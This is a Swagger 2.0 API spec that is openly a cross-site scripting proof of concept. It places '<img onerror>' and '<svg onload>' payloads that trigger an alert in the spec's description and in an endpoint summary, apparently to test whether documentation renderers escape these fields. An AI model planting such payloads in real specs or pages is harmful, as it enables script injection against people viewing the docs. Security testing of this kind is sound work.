swagger: "2.0"
info:
  title: "XSS PoC"
  description: "<img src=x onerror=alert('XSS')>"
  version: "1.0.0"
host: "example.com"
schemes:
  - https
paths:
  /test:
    get:
      summary: "<svg onload=alert('XSS')>"
      description: "This is a test endpoint with XSS PoC"
      parameters: []
      responses:
        '200':
          description: "Successful response"
